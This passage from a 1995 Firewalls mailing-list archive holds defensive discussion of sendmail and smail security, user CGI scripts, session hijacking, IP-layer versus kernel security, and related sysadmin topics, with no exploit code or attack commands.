ESMTP id JAA12895 for ; Thu, 14 Sep 1995 09:12:23 -0700 Received: from sparky.oit.osshe.edu (sparky.OIT.OSSHE.EDU [140.211.71.3]) by osshe.edu (8.6.5/8.6.5) with ESMTP id JAA16801; Thu, 14 Sep 1995 09:10:58 -0700 Received: from ip-davin.oit.osshe.edu (ip-davin.oit.osshe.edu [140.211.84.203]) by sparky.oit.osshe.edu (8.6.12/8.6.12) with SMTP id JAA10872; Thu, 14 Sep 1995 09:08:31 -0700 Date: Thu, 14 Sep 1995 09:09:13 -0900 (PDT) From: Davin Petersen To: "John G. Thompson" cc: Rick Smith , firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail X-Sender: davin@mail.oit.osshe.edu In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 1995, John G. Thompson wrote: > > ..Sendmail is the only useful mail package out there out there. I'd be happy > > to adopt anything which offers me Sendmail functionality in a more secure > > fashion.... > > Have you honestly looked at smail? The last time I personally used smail, I discovered a bug that allowed anyone (using a long series of cryptic command line args) to write a 0 length file _anywhere_ in the filesystem. Perhaps /etc/passwd as a possible target? At that time I also learned that problems like this were cropping up all the time in smail. I moved to Sendmail 8.6.12 and have been very happy. Don't be worried about rewriting rules or anything like that. The BEST method of learning sendmail and SMTP mail managment is to start with O'Reilly's "Bat" book titled "Sendmail". It did wonders for me, at the time a newbie to mail managment. There is also quite a bit of name hiding that you can do in sendmail. my $0.02 Davin Petersen From firewalls-owner Thu Sep 14 10:31:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA15897 for firewalls-outgoing; Thu, 14 Sep 1995 10:14:11 -0700 Received: from maildrop.micrognosis.com (supernova.micrognosis.com [192.233.13.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA15884 for ; Thu, 14 Sep 1995 10:14:05 -0700 Received: by maildrop.micrognosis.com (4.1/SMI-4.1) id AA03922; Thu, 14 Sep 95 13:12:48 EDT Received: from singhi.corp.micrognosis.com(193.32.166.28) by supernova.micrognosis.com via smap (V1.3) id sma003912; Thu Sep 14 13:12:21 1995 Received: from becks (becks.corp.micrognosis.com) by corp.micrognosis.com (4.1/1.0-integ.cf) id AA09992; Thu, 14 Sep 95 13:15:25 EDT Date: Thu, 14 Sep 1995 13:15:20 -0400 (EDT) From: Adam Jack X-Sender: ajack@becks To: Stefan Thatcher Cc: firewalls@greatcircle.com Subject: Re: WWW - http - cgi_scripts In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stefan, On Thu, 14 Sep 1995, Stefan Thatcher wrote: > Sounds OK but little bells have started ringing in the malicious.paranoia.uk > domain at the thought of untamed cgi's roaming the country-side (:-o Consider the WN server - freely available at : http://hopf.math.nwu.edu/ We run it with FORBID_CGI set - i.e. CGI disallowed. It also is pretty security concious. If that isn't a possibility - ensure that whetever mechanism you allow for mirroring user HTML trees to the server - you remove all executable permissions. Adam -- +1-203-730-5437 | http://www.micrognosis.com/~ajack/index.html From firewalls-owner Thu Sep 14 10:32:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA16200 for firewalls-outgoing; Thu, 14 Sep 1995 10:18:55 -0700 Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA16193 for ; Thu, 14 Sep 1995 10:18:48 -0700 Received: by london.micrognosis.com (4.1/NAR-Gateway) id AA26904; Thu, 14 Sep 95 18:17:23 BST Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) id sma026901; Thu Sep 14 18:16:27 1995 Received: by zeus.london.micrognosis.com (4.1/SMI-4.1) id AA27452; Thu, 14 Sep 95 18:16:25 BST From: nreadwin@london.micrognosis.com (Neil Readwin) Message-Id: <9509141716.AA27452@zeus.london.micrognosis.com> Subject: Re: User Authentication To: frankw@in.net (Frank Willoughby) Date: Thu, 14 Sep 1995 18:16:24 +0100 (BST) Cc: firewalls@GreatCircle.com In-Reply-To: <9509131934.AA21430@su1.in.net> from "Frank Willoughby" at Sep 13, 95 03:34:49 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 798 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I was surfing on the net one day and stumbled onto one with a slick > user I/F where you can watch the net traffic & just hit a key to take > over the session. That presupposes that the traffic is going past you. Most of the "interesting" traffic going through my firewall just makes a dozen or so hops across networks run by our IP providers before disappearing into another firewall. Unless you are snooping on the transit networks you cannot steal the session from the outside. Of course HTTP traffic goes everywhere, but I don't care if you start faking Web pages for my users :-) Neil. PS Can we stop with the shell programming and assembler? Pretty please? -- nreadwin@micrognosis.co.uk Phone: +1 908 855 1221 x519 Anything is a cause for sorrow that my mind or body has made From firewalls-owner Thu Sep 14 10:52:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14580 for firewalls-outgoing; Thu, 14 Sep 1995 09:51:41 -0700 Received: from atdesk.atdesk.com (sl02-030.sunbelt.net [165.166.1.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA14554 for ; Thu, 14 Sep 1995 09:51:31 -0700 Date: Thu, 14 Sep 1995 09:51:31 -0700 Received: from zork.atdesk.com by atdesk.atdesk.com id aa16600; 14 Sep 95 12:50 EDT X-Sender: del@atdesk.atdesk.com X-Mailer: Windows Eudora Light Version 1.5.2b1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: David Lupo Subject: Re: MVS vs the world Message-ID: <9509141250.aa16600@atdesk.atdesk.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >In Firewalls-Digest V4 #526 Warren Moore replied to cjolley@iac.net: > >> I still have mine, but it does not explain what the following code does: >> > > BALR 3,0 > > > > BALR 3,3 > >It's been 20 or so years, but without seeing it could be >anything from a basic parsing routine (Reg 0 & 1 were typically input), to a >realllly tight loop. > Ah, that brings back memories! What an elegant two-pass loop! BranchAndLinkRegister (normally used for subroutine calls) puts the return address (address of the following instruction) in the first register and branches to the address in the second, unless the second is zero, in which case it does not branch. -------------------------------------------------------- David Lupo (davidlupo@acm.org, del@atdesk.com) Automated Trading Desk voice: (803) 884-9191 Mount Pleasant, South Carolina fax: (803) 884-9140 From firewalls-owner Thu Sep 14 11:02:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14049 for firewalls-outgoing; Thu, 14 Sep 1995 09:43:37 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA14034 for ; Thu, 14 Sep 1995 09:43:31 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09841; Thu, 14 Sep 95 12:33:13 -0400 Date: Thu, 14 Sep 95 12:33:12 -0400 Message-Id: <9509141633.AA09841@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Firewall off Rod McBan DCLVI Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This is already done with the Sega channel, no? Only the medium is >different. My, I wish I had time to experiment with this sort of thing.. ;) >Speaking of billing problems, anyone read your comp.protocols.tcp-ip.domains >lately? Again take a close look at the Nescape Commerce server. I presented a way a couple of years ago to use assymetric encryption to pass financial info over the net using ITAR-legal client software and they seem to have picked up on that 8*). What I am seeing is that a lot of developent has been going on even though the fed. has blocked its commercial release with threat of ITAR (mainly by persecuting Phil - no I used the rite word). Enough is starting to leak through the cracks that the minute the gov allows 64 bits instead of 40 (and do not understand how that is relevant to RSA anyway) there is going to be a major shift in how the net is used. All of the pieces are there and let the dam spring just one little hole... Warmly, Padgett ps still can say "EBCDIC is not encryption" 8*). From firewalls-owner Thu Sep 14 11:02:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA18132 for firewalls-outgoing; Thu, 14 Sep 1995 10:47:53 -0700 Received: from argo.hks.com (argo.hks.com [192.156.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA18115 for ; Thu, 14 Sep 1995 10:47:45 -0700 Received: from ragnarok.hks.com (ragnarok.hks.com [192.101.199.9]) by argo.hks.com (8.6.12/8.6.12) with ESMTP id RAA12169 for <@hks.com:firewalls@GreatCircle.COM>; Thu, 14 Sep 1995 17:46:28 GMT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) for firewalls@GreatCircle.COM id NAA12153; Thu, 14 Sep 1995 13:46:27 -0400 From: "Jim Littlefield" Message-Id: <9509141346.ZM12151@ragnarok.hks.com> Date: Thu, 14 Sep 1995 13:46:27 -0400 In-Reply-To: Stefan Thatcher "WWW - http - cgi_scripts" (Sep 14, 4:42pm) References: X-Mailer: Z-Mail (3.2.1 15feb95) To: firewalls@GreatCircle.COM Subject: Re: WWW - http - cgi_scripts Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 14, 4:42pm, Stefan Thatcher wrote: : Hi, : not sure whether this is a Firewall query, but here goes - : : The powers that be have decreed that a WWW server be set up to allow individuals : to write their own pages on it :-) : Sounds OK but little bells have started ringing in the malicious.paranoia.uk domain : at the thought of untamed cgi's roaming the country-side (:-o : I'd sure appreciate any advice, pointers, tips etc before setting out on this long : and lonely road /:-) You may have answered your own question--disable cgi's for the "general public". -- Jim Littlefield "Soon anyone who's not on the World Wide Web will qualify for a government subsidy for the home-pageless." - Scott Adams From firewalls-owner Thu Sep 14 11:17:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA18319 for firewalls-outgoing; Thu, 14 Sep 1995 10:51:30 -0700 Received: from spchp46.BBN.COM (SPCHP46.BBN.COM [128.89.4.149]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA18311 for ; Thu, 14 Sep 1995 10:51:26 -0700 Received: by spchp46.BBN.COM (1.37.109.16/16.2) id AA038486347; Thu, 7 Sep 1995 13:52:27 -0400 Date: Thu, 7 Sep 1995 13:52:26 -0400 (EDT) From: Christopher Osborn To: Stefan Thatcher Cc: firewalls@greatcircle.com Subject: Re: WWW - http - cgi_scripts In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 14 Sep 1995, Stefan Thatcher wrote: > Hi, > not sure whether this is a Firewall query, but here goes - > > The powers that be have decreed that a WWW server be set up to allow individuals > to write their own pages on it :-) > Sounds OK but little bells have started ringing in the malicious.paranoia.uk domain > at the thought of untamed cgi's roaming the country-side (:-o > I'd sure appreciate any advice, pointers, tips etc before setting out on this long > and lonely road /:-) > > TIA Stefan Configure your WWW server to forbid CGI scripts in the users directories. check out http://hoohoo.ncsa.uiuc.edu/docs/tutorials/user.html (something like Options NONE for that directory) Users can run "safe" cgi from a central depository on your WWW server that YOU control. All cgi must be approved in order to be placed in this area. Also think about running pearl -t(perl 5.0) or taintperl(4.036) in order to limit access to the file system. Check out cgi-wrap(cant remember the URL) as well. CGI can possibly create not just a security nightmares but also bring down your server so review submitted cgi scripts carefully. The WWW security faq has all the details you may need(http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq) > -------------------------------------------------------------------------------- > Stefan Thatcher v: +44 (0)1642 210 087 +======================================================================+ Christopher Osborn cosborn@bbn.com WWW/BBS Site Engineer EMail ^^ for Public Key Bolt, Beranek, and Newman, INC. http://www.spc.bbn.com/ Software Products My opinions may or may not reflect the views of my employer. From firewalls-owner Thu Sep 14 11:31:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18846 for firewalls-outgoing; Thu, 14 Sep 1995 11:00:56 -0700 Received: from arthur.cs.purdue.edu (arthur.cs.purdue.edu [128.10.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18839 for ; Thu, 14 Sep 1995 11:00:52 -0700 Received: from narnia.cs.purdue.edu (swlodin@narnia.cs.purdue.edu [128.10.17.74]) by arthur.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) with ESMTP id ; Thu, 14 Sep 1995 12:59:26 -0500 Received: (swlodin@localhost) by narnia.cs.purdue.edu (8.6.10/PURDUE_CS-1.3) id ; Thu, 14 Sep 1995 12:59:22 -0500 From: "Steven W. Lodin" Message-Id: <9509141259.ZM1593@narnia.cs.purdue.edu> Date: Thu, 14 Sep 1995 12:59:20 -0500 In-Reply-To: gary flynn "Re: Firewall off Mortal Kombat XIV" (Sep 14, 10:48am) References: <199509141449.HAA08346@miles.greatcircle.com> X-Face: Mx\#!$C!&CSez|Z]d^0t`P#ZJlPoyC#zJN;#4nwe8h4-rnXL-2>=!if`{Pi-*s^"vRs}SK]oA(n<(QS:gHZ%CX+Kq~It<%Glg~r_mv2*-l]x+19x*wHC]ON}`47?]4{9>^w^S~/JxeEF!npYd1CLIp@}fA6|L~A:rBAuLlkfoQ~SlAIZsIkTrqFw5$uN4#P^Tga+BLOg X-Mailer: Z-Mail (3.2.0 06sep94) To: gary flynn Subject: IPv6 (was Re: Firewall off Mortal Kombat XIV) Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 14, 10:48am, gary flynn wrote: > > Can someone point me to a site that can tell me the progress of IPv6... > both the protocols and implementations? http://playground.sun.com/pub/ipng/html/ipng-main.html This site has info on working groups, specifications, and implementations. It seems fairly current. Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ From firewalls-owner Thu Sep 14 12:02:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA21422 for firewalls-outgoing; Thu, 14 Sep 1995 11:59:27 -0700 Received: from vulcan.iss.bnr.com (vulcan.iss.bnr.com [139.51.128.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA21408 for ; Thu, 14 Sep 1995 11:59:19 -0700 From: Mark_W_Loveless@smtp.bnr.com Received: from smtp.bnr.com by vulcan.iss.bnr.com (4.1/BNR/v1.0/910819) id AA23075; Thu, 14 Sep 95 13:58:00 CDT Received: from cc:Mail by smtp.bnr.com id AA811112277; Thu, 14 Sep 95 13:49:46 CST Date: Thu, 14 Sep 95 13:49:46 CST Message-Id: <9508148111.AA811112277@smtp.bnr.com> To: firewalls@greatcircle.com Subject: Firewalls/Plus Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Upper management went to a trade show and was very interested in Firewalls/Plus, an MS-DOS based firewall. Does anyone have any info regarding how easy/reliable/workable this thing is? I have been charged with info gathering against my will (God bless trade shows). No advertising, I've already received the brochures. I'm curious to get any real world experience from a non-Unix non-router solution like this anyway... Mark From firewalls-owner Thu Sep 14 12:07:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19575 for firewalls-outgoing; Thu, 14 Sep 1995 11:16:34 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA19568 for ; Thu, 14 Sep 1995 11:16:30 -0700 Received: from pm1-03.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA09922; Thu, 14 Sep 95 13:14:40 -0400 Date: Thu, 14 Sep 95 13:14:40 -0400 Message-Id: <9509141714.AA09922@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> Of course a class B operating system is itself a large, capable, general >> purpose package. > >True enough. The point is, you have to identify and exploit >appropriate holes in both sendmail and in the nonbypassible access >control mechanism of the OS. A properly designed mechanism is going to >present a different kind of penetration problem. If I remember right, the Orange Book does *not* permit classified and unclassified users on the same system - even if the system has been certified as A1. Probably for good reason. In my experience in the information security field, there is no such thing as a "nonbypassible access control mechanism" of an O/S. Anything can be compromised. It is a simple matter of how much time, manpower, resources, and/or money you are willing to spend to accomplish your objective. As far as the penetration problem goes, it depends on what type of environment you are dealing with. If the target is a host, there is a significant penetration problem when dealing with sendmail. However, if the target is an application gateway (firewall), then the penetration attack is handled at the application layer & (if done right - which most reputable firewall vendors do) the attack never gets to the O/S. We are assuming of course, that we haven't lost our common sense (and our minds) by allowing users to have accounts on our firewall. Definitely not a good idea - even if the system were A1 certified (a la Orange Book). %< [snip] (extra stuff deleted) Best Regards, Frank >Rick. >smith@sctc.com secure computing corporation > > > From firewalls-owner Thu Sep 14 12:07:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA18561 for firewalls-outgoing; Thu, 14 Sep 1995 10:55:13 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA18553 for ; Thu, 14 Sep 1995 10:55:06 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id MAA01265 for ; Thu, 14 Sep 1995 12:57:11 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 003340000; 14 Sep 95 13:54 CDT Received: from sctc.com by sccmailhost.sctc.com id 074540000; 14 Sep 95 13:53 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id MAA28182; Thu, 14 Sep 1995 12:53:39 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id MAA01801; Thu, 14 Sep 1995 12:53:39 -0500 Date: Thu, 14 Sep 1995 12:53:39 -0500 From: Rick Smith Message-Id: <199509141753.MAA01801@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Firewall off Mortal Kombat XIV Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For the record, I'm not opposed to deploying IP level security measures. But I don't think they're any sort of panacea. The cost benefit tradeoff won't always tip towards IP layer crypto. >william.wells wrote: >> As for the comment about being 'behind the curve'. The example I use >> is NFS. It was written to fill a niche and has blossomed into code >> supported on most any TCP/IP system. There are more secure replacements >> available but critical mass and lack of widespread support assures >> they won't generally be used. ... Ted Doty writes: >Yet ANOTHER reason to do it in IP. If my mount program is brain damaged, >and does sillyness like exporting everything to the world because my >command line was longer than 128 (or 156, or 212, or ...), then I'm STILL >OK is I have decent authentication and access control in the kernel. Another way to look at the problem is in terms of processor backplanes and security perimeters. Where is the security perimeter? We don't encrypt across our backplanes and we never will, because we need the speed. Perhaps the same argument applies to NFS and X Windows. Industry trends imply that high security on those ranks more as a "nice to have" than a "need." If some IP level security mechanism "secures" them for some purposes, fine. But that's not going to solve all underlying security problems. >If we try to secure all applications, past, present, and future, then my >son (turns 3 tomorrow!) will have a great future as an Internet Security >Consultant. The point is, we don't have to secure everything. And we won't. We will define and secure some perimeters and we'll take some risks with traffic that crosses the perimeters. > We should do it once, right. Passwords looked "right" to a lot of people 30 years ago. And they probably were "right" back then. Times change and so does security. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Sep 14 12:58:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19529 for firewalls-outgoing; Thu, 14 Sep 1995 11:15:32 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA19522 for ; Thu, 14 Sep 1995 11:15:24 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id NAA18181; Thu, 14 Sep 1995 13:11:50 -0400 Date: Thu, 14 Sep 1995 13:11:50 -0400 From: Ted Doty Message-Id: <199509141711.NAA18181@kgbvax.network.com> To: bdboyle@maverick.erenj.com, firewalls@greatcircle.com Subject: Re: Firewall off Mortal Kombat XIV In-Reply-To: Mail from '"Bryan D. Boyle" ' dated: Thu, 14 Sep 1995 10:43:53 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bryan D. Boyle wrote: > > On Sep 14, 8:36am, Ted Doty wrote: > > > > All in all, the "hard crunchy shell around the soft chewy center" is looking > > more an more like the Maginot Line. > > Depends on your definition. Read the Berferd paper for inspiration--lots of [snip] The Berferd story doesn't address this. While you are correct when you say proper audit collection and analysis is essential, it does not address what happens when an attacker goes around my defenses. If the data doesn't go through my firewall, I can't stop it. That was the whole point of one of the earlier postings: "My foobaz firewall doesn't proxy HTTP, so all my users are getting PPP dial-up access from their desks ..." Your firewall is in Strassbourg, and the hackers are using an Internet provider in Luxembourg. ;-) [snip] > One would dare take that example, > perchance, as a model for firewall design at the service level (telnet, ftp, > hypedtext, news, etc), with the proviso that by enlarging the model to > *acknowledge* flanking maneuvers by determined foemen, we could resist a > determined focused charge at our stone wall, while protecting the flanks, AND > giving us time to alert the messengers and get the rest of the defense into > line. Nobody will attack your stone wall, you don't even know where your flanks are, and your users won't listen to your messengers or get into line. Security fails if it is centralized into a single point defense, if it is trivial to bypass, and if there is no organizational clout to enforce rules against doing so. Unfortunately, that about sums up the situation most of us are in. > One must assume, in any case, that the application > code cranker or the kernal guru is only interested in *their* narrow focus. As > a net admin, we are the ones that have to define, no matter what smells and > bells they add in the realm of creeping featuritis, what the limits of their > operation in the hands of the GUP (great unwashed population) will be. The application coders shouldn't have to be bothered. The kernel gurus should only have to be bothered very rarely, to give be decent tools that I can apply (once) in all my hosts. Hell, I already have to set up YP and all that, it wouldn't be too much more to set up TCP wrappers, as a second line of defense. The first line of defense would be crypto authentication, so that I can screen out most dangerous things before they even get to the app. This still leaves email, but I can always pipe that thru Sidewinder. > > I'm fairly optimistic anout something like IPSec combined with TCP wrappers; [snip] > How about the other way: define the boundaries and then write the code > (gasp!...:)) Unfortunately, the world is filled with millions of applications that will never be updated. Like I said, if I have to change something, let me change it ONCE, and get ALL my applications (past present, and future). -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Thu Sep 14 13:00:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA22609 for firewalls-outgoing; Thu, 14 Sep 1995 12:19:09 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA22602 for ; Thu, 14 Sep 1995 12:19:03 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id OAA23887; Thu, 14 Sep 1995 14:16:56 -0500 Message-Id: <199509141916.OAA23887@psisa.com> Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Thu, 14 Sep 1995 14:16:56 -0500 (CDT) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199509131728.MAA20468@shade.sctc.com> from "Rick Smith" at Sep 13, 95 12:28:59 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 660 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The point is, you *can't* guarantee that a large, capable, general > purpose package is bug free, whether the bugs are security oriented or > anything else. So you need something to backstop it, like Type > Enforcement or maybe MLS protections. No one said that you can guarantee it. And that has nothing to do with large, capable, or general purpose. Ever heard of systems designed by humans? Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz "And dsmit hailed: | _/\__ \| \ \ Pencom Systems Administration Services We shall smit thou |_| /___/|_|__\ on-site at IBM, Gov't Services, Boulder, CO forever!" From firewalls-owner Thu Sep 14 13:02:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA22464 for firewalls-outgoing; Thu, 14 Sep 1995 12:17:04 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA22438 for ; Thu, 14 Sep 1995 12:16:48 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id OAA23838; Thu, 14 Sep 1995 14:14:35 -0500 Message-Id: <199509141914.OAA23838@psisa.com> Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Thu, 14 Sep 1995 14:14:35 -0500 (CDT) Cc: jgt10@amdahl.com, smith@sctc.com, firewalls@GreatCircle.COM In-Reply-To: <199509141440.JAA19663@shade.sctc.com> from "Rick Smith" at Sep 14, 95 09:40:37 am From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1466 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Even if today's version of "smail" is proven secure (unlikely) then > where are we going to find the time/money/effort/expertise to prove > that next years' patched version is also secure? And what about the > incremental changes after that? At some point even the best designed > and engineered software component will look like sendmail, especially > packages in the public domain. It costs lots of money and effort to > maintain design integrity across multiple releases, and that's a huge > source of bugs right there. So, what are you saying? The eternal bogus wisdom that there is no such thing as a secure (including parts of it) seems to catch every single discussion here. Get real and spare us with these academical discussions. The most secure firewall doesn't help if someone can still walk out of the building with a tape full of confidential material. I mean, what's the point of this nonsense. You can only provide security to a certain degree, that doesn't mean at all that your standards are neccessarily low or anything. I'm aware of the problem and I pointed it out. And if I have something delicate which I cannot fix, I'll build a wall around it. There is no perfect world. Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz "And dsmit hailed: | _/\__ \| \ \ Pencom Systems Administration Services We shall smit thou |_| /___/|_|__\ on-site at IBM, Gov't Services, Boulder, CO forever!" From firewalls-owner Thu Sep 14 13:04:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA19791 for firewalls-outgoing; Thu, 14 Sep 1995 11:21:08 -0700 Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA19776 for ; Thu, 14 Sep 1995 11:21:02 -0700 Received: by gateway.damark.com; id NAA18701; Thu, 14 Sep 1995 13:19:46 -0500 Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme018697; Thu, 14 Sep 95 13:19:25 -0500 Received: by damark.com (5.65/1.2-eef) id AA20648; Thu, 14 Sep 95 13:17:17 -0500 Message-Id: <9509141817.AA20648@damark.com> From: "william.wells" To: firewalls Subject: Re: Firewall off Mortal Kombat XIV Date: Thu, 14 Sep 95 13:12:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> William Wells, Damark International >Ted Doty, Network Systems Corporation >> If the consumer wanted security, programmers would add it. The leading >> home financial software packages support passwords; why? because the >> people using their software don't want people snooping. When companies >> lose market share because of poor security, vendors will add it. This > >Well said. Mostly companies go out of business because they INCLUDE >security features, which makes their product more costly, harder to >use, slower, ... > >Yet another reason to put it in the kernel. > You have well said... Security, if properly integrated, doesn't make things harder to use. I've worked on B3 systems and barely knew the security was there and I've worked on other systems where its been a pain. UNIX security seems to be less comprehensive than some of the proprietary systems (which are dying because "everyone wants UNIX"- excepting those on PCs and Macs). UNIX and NFS have many of the same characteristics: the standard features (?) tend to be a 'lowest common denominator' set with application developers filling in the slack. As an example, it amazes me that UNIX, which predates some proprietary systems, STILL doesn't understand what a labeled tape is and is unable to automatically associate which of several jobs wants to use a labeled tape which was just mounted on any drive. Any operations manager who deals with UNIX systems would love to get that. (Especially those who have used non-UNIX mainframe systems. I've talked to UNIX admins who don't have a clue what the above means.) That is something which belong in the kernel but which has been defaulted to third party developers (who also seem to not be able to get it right). So, put security in the kernel: hopefully it will work right. Split privileges into more than "root" or "not-root"; allow ACLs, etc. Maybe it will work properly in a multi-vendor environment. Once you get there, though, you still have the networked SQL database engines which bypass all of UNIX (or any other platform's) system security by sticking their network service outside of the control of the kernel and who knows what other applications in the future (was that SEGA games?). >> As for the comment about being 'behind the curve'. The example I use >> is NFS.... >Yet ANOTHER reason to do it in IP. If my mount program is brain >damaged, and does sillyness like exporting everything to the world >because my command line was longer than 128 (or 156, or 212, or ...), >then I'm STILL OK is I have decent authentication and access control >in the kernel. > >If we try to secure all applications, past, present, and future, then >my son (turns 3 tomorrow!) will have a great future as an Internet >Security Consultant. We should do it once, right. My big concern for the future Internet Security Consultants is that the application developers will have so muddied what a connection can do that the only way to keep their applications from doing damage is to run every application in a restrictive sub-shell on every system. Either that, or the firewalls essentially "execute" every packet but even then, things will get past. If the application developers can trigger things to occur on your desktop (or mainframe) which you don't want by what is sent on the connection, then all the protection of a firewall is for naught. We'll be guarding the front door, not realizing that the walls have fallen down. William Wells Manager, Technical Support Damark International, Inc william.wells@damark.com From firewalls-owner Thu Sep 14 13:08:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA14417 for firewalls-outgoing; Thu, 14 Sep 1995 09:49:45 -0700 Received: from 